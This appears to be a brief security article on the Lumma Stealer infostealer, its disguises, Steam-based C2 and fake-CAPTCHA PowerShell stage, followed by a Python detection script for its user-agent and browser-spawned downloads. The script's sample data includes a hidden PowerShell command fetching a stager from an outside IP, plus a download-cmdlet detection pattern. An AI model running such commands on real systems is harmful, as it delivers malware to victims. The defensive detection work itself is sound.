
Detections of infostealer malware, specifically Lumma Stealer, increased by almost 400% during the latter part of 2024.
Lumma Stealer is a malware strain targeting two-factor authentication (2FA) crypto wallets, browser extensions, and user credentials. It is often disguised as legitimate applications, such as “CCleaner 2024.” Upon extracting the malicious .rar archive, the payload includes a .NET executable named “XTbDOBjB3.exe.”
Recent activity indicates that Lumma Stealer has adopted the use of Steam for command-and-control (C2) operations by connecting to accounts with obfuscated usernames embedded in the code. Following execution, the malware is known to redirect victims to fraudulent CAPTCHA pages controlled by the threat actor. These fake verification steps initiate a PowerShell command that downloads a stager onto the victim’s device.
First discovered in 2022, Lumma Stealer has become a sought-after tool among threat actors. Written in C, it operates under a Malware-as-a-Service (MaaS) model, frequently advertised on Russian-language forums. Initially, data exfiltration was achieved via POST requests, with the user-agent string “TeslaBrowser/5.5” being a notable characteristic.
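Two of the behaviours described above are straightforward to hunt for: the "TeslaBrowser/5.5" user-agent on outbound requests, and a PowerShell process launched from a browser after a fake CAPTCHA page. The following is an added example written for this page, not code from the article or from any vendor; the proxy-log format, the process-event fields, the sample lines and the browser/cmdlet lists are constructed assumptions you would adapt to your own telemetry.

```python
"""Lightweight detections for the Lumma Stealer tradecraft described above.

Added example, not from the original article. Log formats, field names and
sample lines are constructed for illustration.
"""
import re
from typing import Dict, List

# Indicator quoted in the article: user-agent seen on early POST-based exfiltration.
LUMMA_USER_AGENT = "TeslaBrowser/5.5"

# Browsers a fake-CAPTCHA page would be rendered in (assumed list; extend as needed).
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
POWERSHELL_PROCESSES = {"powershell.exe", "pwsh.exe"}

# Generic PowerShell download primitives. Heuristic only: the article says the
# CAPTCHA page triggers a PowerShell download, not which cmdlet is used.
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile",
    re.IGNORECASE,
)

# Constructed proxy log: "client method url status \"user-agent\"".
PROXY_LOG = [
    '10.0.0.5 GET http://intranet.example/ 200 "Mozilla/5.0"',
    '10.0.0.5 POST http://203.0.113.7/gate 200 "TeslaBrowser/5.5"',
    '10.0.0.9 GET http://intranet.example/logo.png 200 "Mozilla/5.0"',
]

# Constructed process-creation events (parent image, child image, command line).
PROCESS_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"parent": "chrome.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden Invoke-WebRequest http://203.0.113.7/stager.ps1"},
    {"parent": "chrome.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]


def find_exfil_user_agent(proxy_lines: List[str]) -> List[str]:
    """Return proxy log lines carrying the Lumma exfiltration user-agent."""
    return [line for line in proxy_lines if LUMMA_USER_AGENT in line]


def find_browser_spawned_powershell(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return PowerShell launches whose parent is a browser and whose command
    line contains a download primitive, the shape of the fake-CAPTCHA stage."""
    hits = []
    for ev in events:
        parent = ev.get("parent", "").lower()
        image = ev.get("image", "").lower()
        if (parent in BROWSER_PROCESSES
                and image in POWERSHELL_PROCESSES
                and DOWNLOAD_PATTERN.search(ev.get("cmdline", ""))):
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for line in find_exfil_user_agent(PROXY_LOG):
        print("exfil UA:", line)
    for ev in find_browser_spawned_powershell(PROCESS_EVENTS):
        print("browser -> powershell download:", ev["cmdline"])
```

The user-agent match is a high-confidence but brittle indicator (the string can change between builds), whereas the browser-to-PowerShell rule is behavioural and survives rebranding but needs tuning against legitimate automation in your environment.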
Sometimes it seems like the Wild West out there in the digital world. Remember to keep your operating systems and malware scanners updated and running!